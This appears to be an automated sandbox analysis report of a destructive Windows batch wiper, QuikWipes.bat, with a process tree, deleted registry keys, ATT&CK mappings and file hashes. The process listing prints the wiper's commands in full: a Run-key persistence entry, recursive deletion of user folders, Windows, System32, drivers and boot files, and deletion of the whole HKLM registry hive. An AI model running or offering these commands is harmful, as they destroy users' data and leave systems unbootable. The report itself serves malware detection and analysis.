Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset\ISO646-US	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\regedit\shell\open\command	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4AE5476C-F4C5-4721-982A-3BE2007DCBD1}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{635CD690-56E1-42EC-B2EC-E187383908DD}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{FF4A9E0E-161A-4476-90EB-81AA17FA7166}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\MediaCatalogMGC\DefaultIcon	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\SharePoint.OpenDocuments.3\CLSID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{000209E4-0000-0000-C000-000000000046}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80757306-5146-11D5-A672-00B0D022E945}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{72B06367-DE53-3111-9C49-B816EFEE3148}\2.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{8E04B90C-FD37-335A-B2B6-DEB02E755036}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{C21F2771-74F7-3E60-A8E2-AE42909B6B5A}\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{98DFBD12-96CB-4F07-90EA-749FF1D6B89D}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{A78AFF90-049C-41EC-B1D8-665968AAC4A6}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8F9F0171-BED2-11D3-80A7-005004D38CA2}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{DEA7EF7F-7862-4D29-BBB4-1CC1A409CC87}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Excelxmlss	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{25DAEE6C-E895-441F-BF3E-69FB4253DFE5}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{FF0BFBDB-1B01-33C9-9B71-7D6F54955940}\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2DFA60E0-78B6-46A1-820A-4EBF7419D043}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E1F5EC9F-F933-492B-A242-C3CDAC6ECFBD}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{627EA7B4-95B5-4980-84C1-9D20DA4460B1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{71233FA0-8B30-45BB-8275-D4106DF98734}\NumMethods	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8BD21D60-EC42-11CE-9E0D-00AA006002F3}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5B3DFB54-36EE-45AF-9A69-366DBF999669}\1.0\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C100BEF1-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C100BEF0-D33A-4a4b-BF23-BBEF4663D017}\InProcServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Word.Wizard.8\CLSID	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{164DDE9C-6688-4CB8-B421-BDF15A7B35E2}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F49C559D-E9E5-467C-8C18-3326AAE4EBCC}\ExtendedErrors	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{000630A5-0000-0000-C000-000000000046}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{96FE0E53-312E-4904-A922-6657B25480B2}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\icofile\shellex\{BB2E617C-0920-11d1-9A0B-00C04FC2D6C1}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\MailFileAtt	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\PowerPoint.Show.12\protocol\StdFileEditing\Verb\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{71DC7F9D-50F3-44AD-A58D-DD192A6C243A}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WMP.WTVFile\shellex\ContextMenuHandlers	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CD000002-8B95-11D1-82DB-00C04FB1625D}\Programmable	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD9DA666-8594-11D1-B16A-00C0F0283628}\Programmable	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{F2B60A10-DED5-46FB-A914-3C6F4EBB6451}\ProxyStubClsid32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{30510720-98B5-11CF-BB82-00AA00BDCE0B}\TypeLib	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Outlook.OlkListBox.1	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.doc	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED475410-B0D6-11D2-8C3B-00104B2A6676}\InprocServer32	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{C86EFB14-9A22-4B11-BDD0-1F8503B542F5}\ProxyStubClsid	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Record\{E048ADF6-C968-3275-9461-D5E85477D1B2}\14.0.0.0	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{521B4726-04E9-47E7-B3A5-CD93A7F74F5B}	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{579919D2-1B10-4584-969C-3E065BD3E22D}	reg.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2168 reg.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

taskkill.exe

description pid process

Token: SeDebugPrivilege 2880 taskkill.exe

pid	process
2168	reg.exe

description	pid	process
Token: SeDebugPrivilege	2880	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 2156 wrote to memory of 2936	2156	cmd.exe	reg.exe
PID 2156 wrote to memory of 2936	2156	cmd.exe	reg.exe
PID 2156 wrote to memory of 2936	2156	cmd.exe	reg.exe
PID 2156 wrote to memory of 2468	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2468	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2468	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2216	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2216	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2216	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2492	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2492	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2492	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2628	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2628	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2628	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2632	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2632	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2632	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2668	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2668	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2668	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2872	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2872	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2872	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2880	2156	cmd.exe	taskkill.exe
PID 2156 wrote to memory of 2880	2156	cmd.exe	taskkill.exe
PID 2156 wrote to memory of 2880	2156	cmd.exe	taskkill.exe
PID 2156 wrote to memory of 2604	2156	cmd.exe	reg.exe
PID 2156 wrote to memory of 2604	2156	cmd.exe	reg.exe
PID 2156 wrote to memory of 2604	2156	cmd.exe	reg.exe
PID 2156 wrote to memory of 2612	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2612	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2612	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2704	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2704	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2704	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2728	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2728	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2728	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 1600	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 1600	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 1600	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2712	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2712	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2712	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2092	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2092	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2092	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 1664	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 1664	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 1664	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2744	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2744	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2744	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 1716	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 1716	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 1716	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 1556	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 1556	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 1556	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 500	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 500	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 500	2156	cmd.exe	cmd.exe
PID 2156 wrote to memory of 2168	2156	cmd.exe	reg.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat"
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2156

C:\Windows\system32\reg.exe
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat /f
2⤵
- Adds Run key to start application
PID:2936

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Users\Admin\Desktop\*
2⤵
PID:2468

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Users\Admin\Pictures\*
2⤵
PID:2216

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Users\Admin\Documents\*
2⤵
PID:2492

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:600

C:\Windows\system32\taskkill.exe
taskkill /f /im cmd.exe
3⤵
- Kills process with taskkill
PID:2044

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:668

C:\Windows\System32\taskkill.exe
taskkill /f /im cmd.exe
3⤵
- Kills process with taskkill
PID:2800

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Users\Admin\Music\*
2⤵
PID:2628

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Users\Admin\Downloads\*
2⤵
PID:2632

C:\Windows\system32\cmd.exe
cmd.exe /k for /R C:\Users\Admin\AppData\Roaming\ %a in (*) do @echo oops you clicked a sus link and now your files are goooone
2⤵
PID:2668

C:\Windows\system32\cmd.exe
cmd.exe /k RMDIR C:\Windows
2⤵
PID:2872

C:\Windows\system32\taskkill.exe
TASKKILL /F /IM EXPLORER.EXE
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2880

C:\Windows\system32\reg.exe
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\QuikWipes.bat /f
2⤵
- Adds Run key to start application
PID:2604

C:\Windows\system32\cmd.exe
cmd.exe /k RMDIR C:\Windows
2⤵
PID:2612

C:\Windows\system32\cmd.exe
cmd.exe /k ren C:\Windows\System32\LogonUI.exe Youareanidiot.exe.pwned
2⤵
PID:2704

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Users\Admin\AppData\Roaming\*
2⤵
PID:2728

C:\Windows\system32\cmd.exe
cmd.exe /k ren C:\Windows\SysWOW64\* *.minishark
2⤵
PID:1600

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Windows\*
2⤵
- Drops file in Windows directory
PID:2712

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Windows\System32\*
2⤵
- Drops file in System32 directory
PID:2092

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Users\Admin\AppData\Roaming\*
2⤵
PID:1664

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\WindowsBoot\*
2⤵
PID:2744

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Windows\System32\winload.exe
2⤵
PID:1716

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Windows\System32\BCD\*
2⤵
PID:1556

C:\Windows\system32\cmd.exe
cmd.exe /k RMDIR C:\Windows\System32\BCD
2⤵
PID:500

C:\Windows\system32\reg.exe
REG DELETE HKLM /f
2⤵
- Adds autorun key to be loaded by Explorer.exe on startup
- Modifies firewall policy service
- Modifies security service
- Manipulates Digital Signatures
- Modifies Installed Components in the registry
- Registers new Print Monitor
- Sets file execution options in registry
- Modifies system executable filetype association
- Registers COM server for autorun
- Adds Run key to start application
- Installs/modifies Browser Helper Object
- Maps connected drives based on registry
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Modifies registry key
PID:2168

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Windows\System32\Drivers\*
2⤵
PID:2756

C:\Windows\system32\cmd.exe
cmd.exe /k del /q /f /s C:\Windows\*
2⤵
PID:2736

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

6

T1547

Registry Run Keys / Startup Folder

6

T1547.001

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Event Triggered Execution

1

T1546

Change Default File Association

Browser Extensions

Privilege Escalation

Boot or Logon Autostart Execution

6

T1547

Registry Run Keys / Startup Folder

6

T1547.001

Create or Modify System Process

2

T1543

Windows Service

2

T1543.003

Event Triggered Execution

1

T1546

Change Default File Association

1

T1546.001

Defense Evasion

Modify Registry

11

T1112

Subvert Trust Controls

1

T1553

SIP and Trust Provider Hijacking

1

T1553.003

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Query Registry

4

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

3

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\21241256387603191375029289893030431015.FUCKYOULMAO
Filesize
27B

MD5
9644e3ba2ce9ddbf0d46353cae08a3d9

SHA1
95dc5c2c66f09a13b9a5c2a9d4f38cab5192febb

SHA256
7f02b3edbe11bef870bea79fda021ecfd6db8b1b307b51f1eae649d5549b60b0

SHA512
1ab5354c16fdc02b0ebc312d4e7e28579861b3172cdc2964c4e49796b1816dfe6c90b8bb4c82a7c506d4c940a6182e11dd446ee22b921285df3c03396e25823a

Download Submit
C:\Users\Admin\Desktop\HACKER3263090441406188493831651513646205699765139263210431490730429291.txt
Filesize
8B

MD5
a911b36535d43a8a9cd54b028ee92236

SHA1
74a5c2013b757dee646e9a2b480a1447fd96d1b3

SHA256
387bda4105dea0edb3d41b38538b9a302a029843d03dfee54724c78c0c241701

SHA512
61b767d5912eb1c3f677c0abf477d828328a39c55e5bee9c4e7336e5a5445020a6b8abfa706f4d8048da9927c0ad77fba4d748d1077bcedd6e3f49b8290e96e3

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads